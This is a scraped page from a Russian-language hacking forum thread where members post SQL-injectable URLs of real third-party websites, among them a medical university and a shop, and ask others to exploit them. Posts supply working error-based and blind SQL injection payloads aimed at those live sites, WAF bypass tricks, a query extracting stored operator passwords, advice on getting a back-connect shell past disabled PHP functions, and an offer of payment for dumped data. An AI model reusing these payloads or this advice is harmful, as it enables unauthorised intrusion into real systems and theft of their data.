Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    577
    Likes Received:
    49
    Reputations:
    54
    Не одними кавычками.
    Нет, параметр вообще не динамический.
     
    1 person likes this.
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,578
    Likes Received:
    398
    Reputations:
    230
    кто дотянет?)
    http://www.worldwaterforum6.org/en/library/?no_cache=1&x_amswwfbd_pi1_list[evenements][564][uid]=564&tx_amswwfbd_pi1_list[evenements]=1
    еррор басе в 1
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    SQLi в string плюс mq = on. поищите в другом месте :)
     
    _________________________
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,578
    Likes Received:
    398
    Reputations:
    230
    раскрутил сам) решил не удалял, чтоб потренились)
    и чтот-то в string?)
     
    1 person likes this.
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    969
    Likes Received:
    120
    Reputations:
    25
    Можно что нибудь сделать? :)
     
  6. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    96
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://le-studio.ch/photographers/index.php?aid=22'
    помогите раскрутить
     
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Кто первым добивается вывода, получает '+'.
     
  8. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    969
    Likes Received:
    120
    Reputations:
    25

    http://clip2net.com/s/3ao8WVf
    http://clip2net.com/s/3ao93wA
     
    #23768 Br@!ns, 13 Jan 2015
    Last edited: 13 Jan 2015
    2 people like this.
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    314
    Reputations:
    163
    uname -a
    Code:
    Linux x.com 2.6.18-308.el5.028stab099.3 #1 SMP Wed Mar 7 15:56:00 MSK 2012 x86_64
    
    хочу порутать, но проблема в том, что не могу сделать бэк-коннект из-за отключенных системных функций
    Code:
     
    Disabled PHP Functions: dl , exec , passthru , pcntl_exec , pfsockopen , popen , posix_kill , posix_mkfifo , posix_setuid , proc_close , proc_open , proc_terminate , shell_exec , system , leak , posix_setpgid , posix_setsid , proc_get_status , proc_nice , show_source , escapeshellcmd
    
    php 5.3.3

    подскажите как можно это обойти и сделать бэк-коннект или хотя бы бинд порта.
     
  10. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Если апач+allowoverride включен, то можно попробовать ssi или cgi.
     
  11. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Как обойти сей WAF?

    Code:
    http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,3+--+
    True

    Code:
    http://ngmu.ru/common.php?page_services&section=-B'+union+select+1,2,user()+--+
    False
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,464
    Likes Received:
    778
    Reputations:
    834
    WAF срабатывает на скобки:
    true
    false
    а вот собственно и таблички:
    и да, обрати внимание, что это "НОВОСИБИРСКИЙ ГОСУДАРСТВЕННЫЙ МЕДИЦИНСКИЙ УНИВЕРСИТЕТ"
     
    _________________________
    #23772 winstrool, 15 Jan 2015
    Last edited: 15 Jan 2015
    5 people like this.
  13. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    И забыл совсем про иные варианты команд. А как можно заменять скобки в таких конструкциях как concat? Char, base64?

    Хотя для char и base64 тоже нужны скобки.
     
    #23773 MaxFast, 15 Jan 2015
    Last edited: 15 Jan 2015
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    urlencode, double urlencode, utf encode
     
    _________________________
    1 person likes this.
  15. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    969
    Likes Received:
    120
    Reputations:
    25
    Помогите со слепой скулей. скриптик написать или сдампить нужные данные.

    https://www.ckbproducts.com/ship_estimator.php?action=process

    POST

    сдампить нужно



    если нужно вознаграждение - в пм или жабу)
     
  16. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    На сайте есть файл crossdomain.xml с таким содержимым:
    Code:
    <cross-domain-policy>
    <allow-access-from domain="*"/>
    </cross-domain-policy>
    Как это можно использовать?
     
  17. lion_art

    lion_art New Member

    Joined:
    20 Mar 2014
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Blind

    Не часто прошу о помощи, но в этот раз не могу понять как докрутить Blind http://occc.com.ua/dl/%22or(ExtractValue(1,concat%280x3a,%28select%28column_name%29from%28information_schema.columns%29where%60table_name%60=information_schema%20and%28ordinal_position=1%29%29%29%29%29=%27 Буду примного благодарен за помощь. :)
     
  18. reuvenmatbil

    reuvenmatbil Member

    Joined:
    1 Sep 2012
    Messages:
    38
    Likes Received:
    5
    Reputations:
    0
    http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&region=2&sessionlogin=1%27

    помогите раскрутить
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    http://sethsec.blogspot.ru/2014/03/exploiting-misconfigured-crossdomainxml.html

    что именно не получается? составьте корректный запрос и все нормально

    Code:
    http://www.urokrost.ru//forms/form_admin.php?ate=&klass=11&lessonform=1&mnu=4&region=2&sessionlogin=1'|(extractvalue(1,repeat(version(),2)))='1
     
    _________________________
    #23779 yarbabin, 18 Jan 2015
    Last edited: 18 Jan 2015
    1 person likes this.
  20. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1

    вот пример как вот здесь,почему не выводится,таким запросом

    5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((select (select (select concat(0x27,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_id as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_passwort as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle.betreiber_kennung as char))),0x27) from `mlsvsf_db`.netzwerk_schnittstelle limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2)) having min(0))
     
Loading...
Thread Status:
Not open for further replies.